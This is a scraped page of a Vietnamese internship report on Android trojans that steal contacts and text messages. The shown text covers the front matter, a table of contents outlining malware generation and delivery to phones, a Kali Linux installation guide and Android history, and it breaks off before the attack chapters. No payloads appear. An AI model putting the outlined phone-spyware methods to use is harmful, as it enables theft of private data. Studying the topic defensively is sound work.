Báo Cáo Cuối Khóa trung tam Athena
Báo Cáo Cuối Khóa trung tam AthenaBáo Cáo Cuối Khóa trung tam Athena
Báo Cáo Cuối Khóa trung tam AthenaKhôi Nguyễn
 
Báo cáo cuối kỳ athena
Báo cáo cuối kỳ athenaBáo cáo cuối kỳ athena
Báo cáo cuối kỳ athenaLeHongQuang2912
 

Similaire à Báo cáo cuối kỳ ATHENA 31/07/2014 (20)

đạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minhđạI học quốc gia thành phố hồ chí minh
đạI học quốc gia thành phố hồ chí minh
 
Báo cáo thực tập Athena
Báo cáo thực tập AthenaBáo cáo thực tập Athena
Báo cáo thực tập Athena
 
Bao cao cuoi ky
Bao cao cuoi kyBao cao cuoi ky
Bao cao cuoi ky
 
Báo cáo cuối kì
Báo cáo cuối kì Báo cáo cuối kì
Báo cáo cuối kì
 
System hacking_Athena
System hacking_AthenaSystem hacking_Athena
System hacking_Athena
 
Triển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internetTriển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internet
 
Bao cao cuoi khoa
Bao cao cuoi khoaBao cao cuoi khoa
Bao cao cuoi khoa
 
Baocaocuoiky athena
Baocaocuoiky athenaBaocaocuoiky athena
Baocaocuoiky athena
 
Báo cáo thực tập cuối kì tô thị hường
Báo cáo thực tập cuối kì   tô thị hườngBáo cáo thực tập cuối kì   tô thị hường
Báo cáo thực tập cuối kì tô thị hường
 
Bao cao thuc tap ck
Bao cao thuc tap ckBao cao thuc tap ck
Bao cao thuc tap ck
 
[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong
 
Baocao athena
Baocao athenaBaocao athena
Baocao athena
 
System Hacking
System HackingSystem Hacking
System Hacking
 
Báo cáo cuối kỳ
Báo cáo cuối kỳBáo cáo cuối kỳ
Báo cáo cuối kỳ
 
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kìBáo cáo thực tập cuối kì
Báo cáo thực tập cuối kì
 
Báo Cáo Cuối Kỳ
Báo Cáo Cuối KỳBáo Cáo Cuối Kỳ
Báo Cáo Cuối Kỳ
 
Báo Cáo Cuối Khóa
Báo Cáo Cuối KhóaBáo Cáo Cuối Khóa
Báo Cáo Cuối Khóa
 
Báo Cáo Cuối Khóa trung tam Athena
Báo Cáo Cuối Khóa trung tam AthenaBáo Cáo Cuối Khóa trung tam Athena
Báo Cáo Cuối Khóa trung tam Athena
 
Báo cáo cuối kỳ athena
Báo cáo cuối kỳ athenaBáo cáo cuối kỳ athena
Báo cáo cuối kỳ athena
 
bao cao cuoi ki
bao cao cuoi kibao cao cuoi ki
bao cao cuoi ki
 

Plus de Seavar Neuvell

Plus de Seavar Neuvell (7)

Baocaotuan2
Baocaotuan2Baocaotuan2
Baocaotuan2
 
Bao cao tuan 5
Bao cao tuan 5Bao cao tuan 5
Bao cao tuan 5
 
Bao cao tuan 4
Bao cao tuan 4Bao cao tuan 4
Bao cao tuan 4
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
Bao cao tuan 1
Bao cao tuan 1Bao cao tuan 1
Bao cao tuan 1
 
Bao cao tuan 3
Bao cao tuan 3Bao cao tuan 3
Bao cao tuan 3
 
Bao cao tuan 1
Bao cao tuan 1Bao cao tuan 1
Bao cao tuan 1
 

Báo cáo cuối kỳ ATHENA 31/07/2014

  • 1. ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH TRƯỜNG ĐẠI HỌC BÁCH KHOA KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO ĐỀ TÀI THỰC TẬP CNTT Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điên thoại sử dụng Android và gửi ra ngoài GVHD: Thầy VÕ ĐỖ THẮNG SVTH: Lê Công Hậu MSSV: 51101058 TPHCM, ngày 28 tháng 07 năm 2014
  • 2. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 1 LỜI CAM ĐOAN Tôi xin cam đoan:  Những nội dung trong báo cáo này là do tôi thực hiện dưới sự hướng dẫn trực tiếp của thầy Võ Đỗ Thắng.  Mọi tham khảo dùng trong báo cáo này đều được trích dẫn rõ ràng tên tác giả, tên công trình, thời gian, địa điểm công bố.  Mọi sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, tôi xin chịu hoàn toàn trách nhiệm. TPHCM, ngày 28 tháng 07 năm 2014 Sinh viên thực tập Lê Công Hậu
  • 3. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 2 LỜI CẢM ƠN KHOA KH & KT MÁY TÍNH, ĐH BK TPHCM Tôi xin chân thành cảm ơn trường Đại Học Bách Khoa TPHCM và khoa Khoa Học và Kỹ Thuật Máy Tính đã tạo điều kiện cho tôi hoàn thành tốt đợt TTCN 2 này. Trong đợt thực tập này đã cho tôi những kinh nghiệm quý báu. Những kinh nghiệm này sẽ giúp tôi hoàn thiện hơn trong công việc và môi trường làm việc sau này. Mặc dù tôi đã cố gắng hoàn thành báo cáo thực tập tốt nghiệp này với tất cả nỗ lực của bản thân. Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn không thể tránh khỏi những thiếu sót nhất định. Tôi rất mong nhận được sự đóng góp, chia sẻ để tôi có thể làm tốt hơn nữa. Một lần nữa tôi xin chân thành cảm ơn. TPHCM, ngày 28 tháng 07 năm 2014 Sinh viên thực tập Lê Công Hậu
  • 4. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 3 LỜI CẢM ƠN TRUNG TÂM ATHENA Tôi xin cảm ơn giám đốc Công Ty Quản Trị và An Ninh Mạng Quốc Tế Athena, cùng các anh chị trong công ty. Đặc biệt, tôi xin chân thành cảm ơn thầy Đỗ Võ Thắng đã nhiệt tình giúp đỡ và hướng dẫn tôi trong suốt thời gian thực tập tại công ty. Thầy đã tạo mọi điều kiện thuận lợi, cung cấp nhũng kiến thức cần thiết cũng như đóng góp những ý kiến quý báu để hoàn thành tốt bài báo cáo này. Mặc dù tôi đã cố gắng hoàn thành báo cáo thực tập tốt nghiệp này với tất cả nỗ lực của bản thân. Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn không thể tránh khỏi những thiếu sót nhất định. Tôi rất mong nhận được sự đóng góp, chia sẻ để tôi có thể làm tốt hơn nữa. Một lần nữa tôi xin chân thành cảm ơn. TPHCM, ngày 28 tháng 07 năm 2014 Sinh viên thực tập Lê Công Hậu
  • 5. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 4 LỜI MỞ ĐẦU Trong những năm gần đây, vấn đề “An toàn và bảo mật thông tin” đang ngày càng nóng. Với sự phát triển đến chóng mặt của các nền tảng di động như iOS, Android, Windows Phone cùng với nhiều dòng điện thoại thông minh, vấn đề bảo mật thông tin chuyển dần xu hướng từ PC sang mobile. Nếu bạn đang sở hữu một chiếc smartphone của Apple, Google Nexus, Samsung, Nokia, HTC, ... liệu bạn có dám chắc là “dế cưng” của mình không bị nhiễm các phần mềm gián điệp, nghe lén không? Vì sao lại như vậy? Vì theo báo cáo gần đây của các hãng phần mềm bảo mật như Kaspersky Lab, Norton AV, Avast hay BKAV số lượng smartphone bị nhiễm mã độc ngày càng tăng. Đặc biệt HĐH Android là một HĐH phát triển khá nhanh trong những năm gần đây lại là một mảnh đất béo bở cho các Hacker tấn công. Với sự nhẹ dạ cả tin, thiếu hiểu biết của người dùng, lòng tham các các thứ “Free” như free app, free wifi đã vô tình tiếp tay cho các Hacker xâm nhập và cài đặt mã độc trên chính chiếc điện thoại của bạn. Hôm nay mình viết bài báo cáo về đề tài “Nghiên cứu các trojan, malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điện thoại Android và gửi ra ngoài” để cùng nghiên cứu, tìm hiểu cách thức hoạt động, chia sẻ thông tin cũng như cung cấp các giải pháp để phòng tránh.
  • 6. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 5 NHẬN XÉT CỦA KHOA .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... TPHCM, ngày ... tháng ... năm 2014 Trưởng Khoa
  • 7. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 6 NHẬN XÉT CỦA CÔNG TY THỰC TẬP .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... TPHCM, ngày ... tháng ... năm 2014 Giám đốc
  • 8. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 7 NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... .................................................................................................................................... TPHCM, ngày ... tháng ... năm 2014 Giáo viên hướng dẫn
  • 9. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 8 MỤC LỤC LỜI CAM ĐOAN..................................................................................................................................1 LỜI CẢM ƠN KHOA KH & KT MÁY TÍNH, ĐH BK TPHCM ..............................................2 LỜI CẢM ƠN TRUNG TÂM ATHENA........................................................................................3 LỜI MỞ ĐẦU .......................................................................................................................................4 NHẬN XÉT CỦA KHOA....................................................................................................................5 NHẬN XÉT CỦA CÔNG TY THỰC TẬP .....................................................................................6 NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN.............................................................................7 MỤC LỤC...............................................................................................................................................8 1 GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP ................................................9 2 NỘI DUNG THỰC TẬP.............................................................................................11 2.1 Làm trên localhost:..........................................................................................................11 2.1.1 Giới thiệu HĐH Kali Linux:...............................................................................11 2.1.2 Cài đặt Kali Linux trên VMware:....................................................................13 2.1.3 Giới thiệu HĐH Android:...................................................................................29 2.1.4 Giới thiệu về Trojan: ...........................................................................................32 2.1.5 Giới thiệu về Malware:.......................................................................................34 2.1.6 Sinh mã độc trên Kali Linux: ...........................................................................36 2.1.7 Đưa mã độc vào thiết bị Android:.................................................................41 2.1.8 Xâm nhập SD card của thiết bị Android từ Kali Linux:........................45 2.1.9 Kết luận:....................................................................................................................47 2.2 Làm trên VPS......................................................................................................................47 2.2.1 Giới thiệu về VPS:.................................................................................................47 2.2.2 Cài đặt mã độc trên VPS: ...................................................................................49 2.2.3 Từ VPS xâm nhập vào thiết bị Android:.....................................................56 3 KẾT QUẢ ĐẠT ĐƯỢC...............................................................................................60 4 KẾT LUẬN QUÁ TRÌNH THỰC TẬP ..................................................................61
  • 10. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 9 1 GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP Cơ sở 1_Tại TP Hồ Chí Minh: - Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA. Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam. Điện thoại: ( 84-8 ) 3824 4041 Hotline: 0943 23 00 99 Cơ sở 2_Tại TP Hồ Chí Minh: - Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA 92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam. Website: www.athena.edu.vn or www.athena.com.vn Điện thoại: (84-8) 2210 3801 Hotline: 0943 20 00 88 - Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành lập từ năm 2004, là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển nước nhà. - Lĩnh vực hoạt động:  Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI, CEH... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An, ngân hàng, doanh nghiệp, các
  • 11. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 10 cơ quan chính phủ, tổ chức tài chính…  Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…  Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự… - Đội ngũ giảng viên:  Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước.... Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc tế (Microsoft Certified Trainer). Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA.  Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA.
  • 12. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 11 2 NỘI DUNG THỰC TẬP 2.1 Làm trên localhost: 2.1.1 Giới thiệu HĐH Kali Linux: Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên bản mới của BackTrack có tên là Kali Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp. Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali. So với BackTrack, Kali có rất nhiều cải tiến: Kali phát triển trên nền tảng hệ điều hành Debian Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập
  • 13. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 12 nhật Repository. Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng. Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các công cụ. Tính tương thích kiến trúc Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note. Hỗ trợ mạng không dây tốt hơn Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây. Khả năng tùy biến cao Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái). Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn toàn nữa
  • 14. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 13 2.1.2 Cài đặt Kali Linux trên VMware: Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài này ta sẽ tiến hành cài phiên bản Kali Linux 1.0.8 64 bit. http://www.kali.org/downloads/ Hình 2.1.1 Download HĐH Kali Linux Nếu học Công nghệ thông tin thì chắc chắn bạn sẽ biết đến phần mềm có tên là VMware. VMware Workstation là một phần mềm tạo máy ảo hàng đầu. Bạn có thể dùng VMware để tạo 1 máy tính ảo chạy Windows, Linux, Mac OS hay thậm chí là Android nữa. VMware Workstation 10 là một phần mềm giả lập hệ điều hành để bàn rất nổi tiếng của hãng VMware Inc. Với hơn 50 tính năng mới, có thể thay đổi đáng kể cách thức làm việc với các máy ảo. Từ giao diện chính của VMware thì nhấn vào File -> New Vitual Machine (hoặc dùng phím tắt Ctrl + N).
  • 15. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 14 Chọn Typical và nhấn Next. Đây là những cài đặt mà VMware khuyên dùng nếu muốn tự thiết lập những tùy chọn thì nhấn vào Custom. Nếu không rành thì tốt nhất cứ chọn Typical đỡ phiền sau này. Ở đây mình chọn Custom và nhấn next. Hình 2.1.2 New Virtual Machine Wizard (Step 1)
  • 16. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 15 Tick vào Installer Disc image file. Và chọn đến file ISO cần cài đặt VMware sẽ tự nhận diện đó là file iso của hệ điều hành nào. Hình 2.1.3 New Virtual Machine Wizard (Step 2)
  • 17. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 16 Sau đó sẽ chọn tên máy ảo và nơi lưu trữ dữ liệu của nó Hình 2.1.4 New Virtual Machine Wizard (Step 3)
  • 18. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 17 Ở những bước sau thì cứ nhấn Next. Đến đây thì có một tùy chọn là “Customize Hardware...” Cái này để thay đổi các thông số như dung lượng RAM, Ổ cứng, USB Controler… Cũng tùy vào hệ điều hành đang cài mà chọn dung lượng cho phù hợp. VMware cũng đã chọn cho mình 1 dung lượng phù hợp rồi. Hình 2.1.5 New Virtual Machine Wizard (Step 4) Sau khi hoàn thành các bước này thì máy ảo sẽ tự động bật và sẽ tiến hành cài đặt một cách tự động. Tùy vào dung lượng mà quá trình sẽ diễn ra nhanh hay chậm thông thường thì mất vài chục phút cho đến vài tiếng. Tuy nhiên với những file ISO không hỗ trợ nhận diện tự động thì bạn vẫn sẽ phải cài bằng tay từng bước như cài win bình thường (điều này cũng không khó khăn lắm đúng không?)
  • 19. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 18 Bạn sẽ nhìn thấy màn hình khởi động của Kali. Chọn một trong hai chế độ cài đặt là Graphical hoặc Text-Mode. Trong bài viết này tôi sẽ chọn Graphical Install Hình 2.1.6 Graphical Install
  • 20. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 19 Chọn ngôn ngữ, vị trí đất nước của bạn sau đó click Continue Hình 2.1.7 Select a language Hình 2.1.8 Select your location
  • 21. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 20 Bạn cũng sẽ được yêu cầu để cấu hình bàn phím với bàn phím bạn đang sử dụng Hình 2.1.9 Configure the keyboard
  • 22. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 21 Bạn sẽ cần phải cấu hình Network và Password cho tài khoản Root Hình 2.1.10 Configure the network Hình 2.1.11 Set up user and password
  • 23. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 22 Tiếp đến bạn sẽ lựa chọn ổ đĩa bạn sẽ cài đặt Kali. Hình 2.1.12 Partition disks (Step 1) Hình 2.1.13 Partition disks (Step 2)
  • 24. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 23 Hình 2.1.14 Partition disks (Step 3) Hình 2.1.15 Partition disks (Step 4)
  • 25. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 24 Hình 2.1.16 Partition disks (Step 5) Hình 2.1.17 Partition disks (Step 6)
  • 26. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 25 Sau khi cấu hình Partition xong, nhấn Continue để quá trình cài đặt bắt đầu. Hình 2.1.18 Install the system
  • 27. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 26 Cấu hình Mirror. Kali sử dụng một kho lưu trữ trung tâm để phân phối các ứng dụng. Bạn sẽ cần phải nhập thông tin proxy thích hợp khi cần thiết. Chú ý: Nếu bạn chọn “No” trong màn hình này, bạn sẽ không thể cài đặt các gói từ kho lưu trữ của Kali. Hình 2.1.19 Configure the package manager
  • 28. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 27 Tiếp đến là cài đặt GRUB Hình 2.1.20 Install the GRUB boot loader on the hard disk Cuối cùng, nhấp vào Continue để khởi động lại Kali. Hình 2.1.21 Finish the installation
  • 29. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 28 Màn hình đăng nhập và sau khi bạn đăng nhập vào Kali. Hình 2.1.22 Kali Linux login
  • 30. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 29 Giao diện sau khi cài đặt xong: Hình 2.1.23 Kali Linux OS 2.1.3 Giới thiệu HĐH Android:
  • 31. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 30 Lịch sử Tổng công ty Android (Android, Inc.) được thành lập tại Palo Alto, California vào tháng 10 năm 2003 bởi Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng sáng lập Tổng công ty Viễn thông Wildfire), Nick Sears (từng là Phó giám đốc T-Mobile), và Chris White (trưởng thiết kế và giao diện tại WebTV) để phát triển, theo lời của Rubin, "các thiết bị di động thông minh hơn có thể biết được vị trí và sở thích của người dùng". Dù những người thành lập và nhân viên đều là những người có tiếng tăm, Tổng công ty Android hoạt động một cách âm thầm, chỉ tiết lộ rằng họ đang làm phần mềm dành cho điện thoại di động. Trong năm đó, Rubin hết kinh phí. Steve Perlman, một người bạn thân của Rubin, mang cho ông 10.000 USD tiền mặt nhưng từ chối tham gia vào công ty. Google mua lại Tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó thành một bộ phận trực thuộc Google. Những nhân viên của chủ chốt của Tổng công ty Android, gồm Rubin, Miner và White, vẫn tiếp tục ở lại công ty làm việc sau thương vụ này. Vào thời điểm đó không có nhiều thông tin về Tổng công ty, nhưng nhiều người đồn đoán rằng Google dự tính tham gia thị trường điện thoại di động sau bước đi này. Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động phát triển trên nền nhân Linux. Google quảng bá nền tảng này cho các nhà sản xuất điện thoại và các nhà mạng với lời hứa sẽ cung cấp một hệ thống uyển chuyển và có khả năng nâng cấp. Google đã liên hệ với hàng loạt hãng phần cứng cũng như đối tác phần mềm, bắn tin cho các nhà mạng rằng họ sẵn sàng hợp tác với các cấp độ khác nhau. Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động xuất hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích rằng Google muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang nỗ lực làm việc để thực hiện điều này. Các phương tiện truyền thông truyền thống lẫn online cũng viết về tin đồn rằng Google đang phát triển một thiết bị cầm tay mang thương hiệu Google. Một vài tờ báo còn nói rằng trong khi Google vẫn đang thực hiện những bản mô tả kỹ thuật chi tiết, họ đã trình diễn sản phẩm mẫu cho các nhà sản xuất điện thoại di động và nhà mạng. Tháng 9 năm 2007, InformationWeek đăng tải một nghiên cứu của Evalueserve cho biết Google đã nộp một số đơn xin cấp bằng sáng chế trong lĩnh vực điện thoại di động. Ngày 5/11/2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance), một hiệp hội bao gồm nhiều công ty trong đó có Texas Instruments,Tập đoàn Broadcom, Google, HTC, Intel, LG, Tập đoàn MarvellTechnology, Motorola, Nvidia, Qualcomm, Samsung Electronics, Sprint Nextel và T-Mobile được thành lập với mục đích phát triển các tiêu chuẩn mở cho thiết bị di động. Cùng ngày, Android cũng được ra mắt với vai trò là sản phẩm đầu tiên của Liên minh, một nền tảng thiết bị di động được xây dựng trên nhân Linux phiên bản 2.6. Chiếc điện thoại chạy Android đầu tiên được bán ra là HTC Dream, phát hành ngày 22 tháng 10 năm 2008. Biểu tượng của hệ điều hành Android mới là một con rôbốt màu xanh
  • 32. Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTH: Lê Công Hậu 51101058 Trang 31 lá cây do hãng thiết kế Irina Blok tại California vẽ. Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ điều hành, bổ sung các tính năng mới và sửa các lỗi trong những lần phát hành trước. Mỗi bản nâng cấp được đặt tên lần lượt theo thứ tự bảng chữ cái, theo tên của một món ăn tráng miệng; ví dụ như phiên bản 1.5 Cupcake (bánh bông lan nhỏ có kem) tiếp nối bằng phiên bản 1.6 Donut (bánh vòng). Phiên bản mới nhất (chính thức) là 4.4 KitKat (bánh chocolate). Vào năm 2010, Google ra mắt loạt thiết bị Nexus - một dòng sản phẩm bao gồm điện thoại thông minh và máy tính bảng chạy hệ điều hành Android, do các đối tác phần cứng sản xuất. HTC đã hợp tác với Google trong chiếc điện thoại thông minh Nexus đầu tiên, Nexus One. Kể từ đó nhiều thiết bị mới hơn đã gia nhập vào dòng sản phẩm này, như điện thoại Nexus 4 và máy tính bảng Nexus 10, lần lượt do LG và Samsung sản xuất. Google xem điện thoại và máy tính bảng Nexus là những thiết bị Android chủ lực của mình, với những tính năng phần cứng và phần mềm mới nhất của Android. Đặc điểm 1. Tính mở. Android được xây dựng từ dưới đi lên cho phép người phát triển tạo các ứng dụng di động hấp dẫn với đầy đủ các điểm mạnh của các thiết bị cầm tay hiện có. Android hoàn toàn mở, một ứng dụng có thể gọi tới bất kể một chức năng lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng máy ảnh, cho phép người phát triển tạo phong phú hơn, liên kết hơn các tính năng cho người dùng. Android được xây dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà đã được tối ưu hóa bộ nhớ và phần cứng với môi trường di động. Android mà một mã nguồn mở, nó có thể được mở 